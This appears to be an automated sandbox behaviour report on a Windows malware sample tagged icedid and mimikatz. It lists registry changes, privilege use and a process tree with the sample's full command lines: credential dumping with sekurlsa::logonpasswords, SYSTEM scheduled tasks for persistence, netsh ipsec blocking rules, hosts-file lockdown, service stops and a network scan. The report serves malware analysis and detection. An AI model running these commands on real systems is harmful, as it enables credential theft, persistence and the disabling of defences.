\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ogmqci.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-08-12_3cfc07636e83894437e3cad25f78d3b3_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1640 cmd.exe 3260 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x000700000002343a-6.dat nsis_installer_2 behavioral2/files/0x0008000000023452-15.dat nsis_installer_1 behavioral2/files/0x0008000000023452-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 47 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbffjjzcl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" upwllyl.exe Key created \REGISTRY\USER\.DEFAULT\Software nbffjjzcl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbffjjzcl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbffjjzcl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbffjjzcl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbffjjzcl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbffjjzcl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbffjjzcl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" upwllyl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbffjjzcl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbffjjzcl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbffjjzcl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbffjjzcl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbffjjzcl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" upwllyl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbffjjzcl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbffjjzcl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbffjjzcl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbffjjzcl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbffjjzcl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbffjjzcl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ upwllyl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" upwllyl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbffjjzcl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbffjjzcl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals nbffjjzcl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbffjjzcl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbffjjzcl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbffjjzcl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbffjjzcl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing nbffjjzcl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbffjjzcl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbffjjzcl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbffjjzcl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbffjjzcl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbffjjzcl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbffjjzcl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbffjjzcl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbffjjzcl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbffjjzcl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbffjjzcl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbffjjzcl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbffjjzcl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbffjjzcl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbffjjzcl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing upwllyl.exe -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" upwllyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" upwllyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ upwllyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" upwllyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" upwllyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" upwllyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ upwllyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ upwllyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ upwllyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ upwllyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ upwllyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" upwllyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ upwllyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" upwllyl.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3260 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2340 schtasks.exe 4268 schtasks.exe 2148 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 648 Process not Found 648 Process not Found 648 Process not Found 648 Process not Found 648 Process not Found 648 Process not Found 648 Process not Found 648 Process not Found 648 Process not Found 648 Process not Found 648 Process not Found 648 Process not Found 648 Process not Found 648 Process not Found 648 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 4608 2024-08-12_3cfc07636e83894437e3cad25f78d3b3_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
description pid Process Token: SeDebugPrivilege 4608 2024-08-12_3cfc07636e83894437e3cad25f78d3b3_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 4956 upwllyl.exe Token: SeDebugPrivilege 212 upwllyl.exe Token: SeDebugPrivilege 4036 vfshost.exe Token: SeDebugPrivilege 4196 nbffjjzcl.exe Token: SeLockMemoryPrivilege 3936 ikjyge.exe Token: SeLockMemoryPrivilege 3936 ikjyge.exe Token: SeDebugPrivilege 2316 nbffjjzcl.exe Token: SeDebugPrivilege 1868 nbffjjzcl.exe Token: SeDebugPrivilege 3460 nbffjjzcl.exe Token: SeDebugPrivilege 1380 nbffjjzcl.exe Token: SeDebugPrivilege 4852 nbffjjzcl.exe Token: SeDebugPrivilege 864 nbffjjzcl.exe Token: SeDebugPrivilege 1764 nbffjjzcl.exe Token: SeDebugPrivilege 2996 nbffjjzcl.exe Token: SeDebugPrivilege 1116 nbffjjzcl.exe Token: SeDebugPrivilege 2428 nbffjjzcl.exe Token: SeDebugPrivilege 1316 nbffjjzcl.exe Token: SeDebugPrivilege 3180 nbffjjzcl.exe Token: SeDebugPrivilege 3256 nbffjjzcl.exe Token: SeDebugPrivilege 3796 nbffjjzcl.exe Token: SeDebugPrivilege 3684 nbffjjzcl.exe Token: SeDebugPrivilege 2608 nbffjjzcl.exe Token: SeDebugPrivilege 1708 nbffjjzcl.exe Token: SeDebugPrivilege 1108 nbffjjzcl.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
pid Process 4608 2024-08-12_3cfc07636e83894437e3cad25f78d3b3_hacktools_icedid_mimikatz.exe 4608 2024-08-12_3cfc07636e83894437e3cad25f78d3b3_hacktools_icedid_mimikatz.exe 4956 upwllyl.exe 4956 upwllyl.exe 212 upwllyl.exe 212 upwllyl.exe 2264 xohudmc.exe 4108 ogmqci.exe 4384 upwllyl.exe 4384 upwllyl.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4608 wrote to memory of 1640 4608 2024-08-12_3cfc07636e83894437e3cad25f78d3b3_hacktools_icedid_mimikatz.exe 84 PID 4608 wrote to memory of 1640 4608 2024-08-12_3cfc07636e83894437e3cad25f78d3b3_hacktools_icedid_mimikatz.exe 84 PID 4608 wrote to memory of 1640 4608 2024-08-12_3cfc07636e83894437e3cad25f78d3b3_hacktools_icedid_mimikatz.exe 84 PID 1640 wrote to memory of 3260 1640 cmd.exe 86 PID 1640 wrote to memory of 3260 1640 cmd.exe 86 PID 1640 wrote to memory of 3260 1640 cmd.exe 86 PID 1640 wrote to memory of 4956 1640 cmd.exe 94 PID 1640 wrote to memory of 4956 1640 cmd.exe 94 PID 1640 wrote to memory of 4956 1640 cmd.exe 94 PID 212 wrote to memory of 2080 212 upwllyl.exe 96 PID 212 wrote to memory of 2080 212 upwllyl.exe 96 PID 212 wrote to memory of 2080 212 upwllyl.exe 96 PID 2080 wrote to memory of 5064 2080 cmd.exe 98 PID 2080 wrote to memory of 5064 2080 cmd.exe 98 PID 2080 wrote to memory of 5064 2080 cmd.exe 98 PID 2080 wrote to memory of 4948 2080 cmd.exe 99 PID 2080 wrote to memory of 4948 2080 cmd.exe 99 PID 2080 wrote to memory of 4948 2080 cmd.exe 99 PID 2080 wrote to memory of 3528 2080 cmd.exe 100 PID 2080 wrote to memory of 3528 2080 cmd.exe 100 PID 2080 wrote to memory of 3528 2080 cmd.exe 100 PID 2080 wrote to memory of 3028 2080 cmd.exe 101 PID 2080 wrote to memory of 3028 2080 cmd.exe 101 PID 2080 wrote to memory of 3028 2080 cmd.exe 101 PID 2080 wrote to memory of 3824 2080 cmd.exe 102 PID 2080 wrote to memory of 3824 2080 cmd.exe 102 PID 2080 wrote to memory of 3824 2080 cmd.exe 102 PID 2080 wrote to memory of 4920 2080 cmd.exe 103 PID 2080 wrote to memory of 4920 2080 cmd.exe 103 PID 2080 wrote to memory of 4920 2080 cmd.exe 103 PID 212 wrote to memory of 4760 212 upwllyl.exe 107 PID 212 wrote to memory of 4760 212 upwllyl.exe 107 PID 212 wrote to memory of 4760 212 upwllyl.exe 107 PID 212 wrote to memory of 4864 212 upwllyl.exe 109 PID 212 wrote to memory of 4864 212 upwllyl.exe 109 PID 212 wrote to memory of 4864 212 upwllyl.exe 109 PID 212 wrote to memory of 3292 212 upwllyl.exe 111 PID 212 wrote to memory of 3292 212 upwllyl.exe 111 PID 212 wrote to memory of 3292 212 upwllyl.exe 111 PID 212 wrote to memory of 4548 212 upwllyl.exe 116 PID 212 wrote to memory of 4548 212 upwllyl.exe 116 PID 212 wrote to memory of 4548 212 upwllyl.exe 116 PID 4548 wrote to memory of 1580 4548 cmd.exe 118 PID 4548 wrote to memory of 1580 4548 cmd.exe 118 PID 4548 wrote to memory of 1580 4548 cmd.exe 118 PID 1580 wrote to memory of 3096 1580 wpcap.exe 119 PID 1580 wrote to memory of 3096 1580 wpcap.exe 119 PID 1580 wrote to memory of 3096 1580 wpcap.exe 119 PID 3096 wrote to memory of 3004 3096 net.exe 121 PID 3096 wrote to memory of 3004 3096 net.exe 121 PID 3096 wrote to memory of 3004 3096 net.exe 121 PID 1580 wrote to memory of 2280 1580 wpcap.exe 122 PID 1580 wrote to memory of 2280 1580 wpcap.exe 122 PID 1580 wrote to memory of 2280 1580 wpcap.exe 122 PID 2280 wrote to memory of 3260 2280 net.exe 124 PID 2280 wrote to memory of 3260 2280 net.exe 124 PID 2280 wrote to memory of 3260 2280 net.exe 124 PID 1580 wrote to memory of 1640 1580 wpcap.exe 125 PID 1580 wrote to memory of 1640 1580 wpcap.exe 125 PID 1580 wrote to memory of 1640 1580 wpcap.exe 125 PID 1640 wrote to memory of 3844 1640 net.exe 127 PID 1640 wrote to memory of 3844 1640 net.exe 127 PID 1640 wrote to memory of 3844 1640 net.exe 127 PID 1580 wrote to memory of 4168 1580 wpcap.exe 128
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2096
-
C:\Windows\TEMP\ncnlkjnby\ikjyge.exe"C:\Windows\TEMP\ncnlkjnby\ikjyge.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3936
-
-
C:\Users\Admin\AppData\Local\Temp\2024-08-12_3cfc07636e83894437e3cad25f78d3b3_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-08-12_3cfc07636e83894437e3cad25f78d3b3_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4608 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ebetisly\upwllyl.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3260
-
-
C:\Windows\ebetisly\upwllyl.exeC:\Windows\ebetisly\upwllyl.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4956
-
-
-
C:\Windows\ebetisly\upwllyl.exeC:\Windows\ebetisly\upwllyl.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:212 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2080 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:5064
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:4948
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3528
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:3028
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3824
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:4920
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4760
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4864
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3292
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\kvbeuieka\ebcevjhrl\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:4548 -
C:\Windows\kvbeuieka\ebcevjhrl\wpcap.exeC:\Windows\kvbeuieka\ebcevjhrl\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1580 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3096 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:3004
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2280 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:3260
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:3844
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:4168
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:3632
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:2136 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:3036
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:3748
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:620 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:4280 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:2632
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\kvbeuieka\ebcevjhrl\kbnuknqlp.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\kvbeuieka\ebcevjhrl\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:5048 -
C:\Windows\kvbeuieka\ebcevjhrl\kbnuknqlp.exeC:\Windows\kvbeuieka\ebcevjhrl\kbnuknqlp.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\kvbeuieka\ebcevjhrl\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4880
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\kvbeuieka\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\kvbeuieka\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2328 -
C:\Windows\kvbeuieka\Corporate\vfshost.exeC:\Windows\kvbeuieka\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4036
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bcglakubn" /ru system /tr "cmd /c C:\Windows\ime\upwllyl.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2996 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1116
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "bcglakubn" /ru system /tr "cmd /c C:\Windows\ime\upwllyl.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4268
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "kbwlyzthv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ebetisly\upwllyl.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:2132 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2964
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "kbwlyzthv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ebetisly\upwllyl.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2340
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "yjzbgifep" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ncnlkjnby\ikjyge.exe /p everyone:F"2⤵PID:1784
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4116
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "yjzbgifep" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ncnlkjnby\ikjyge.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2148
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1428
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:5108
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3876
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3724
-
-
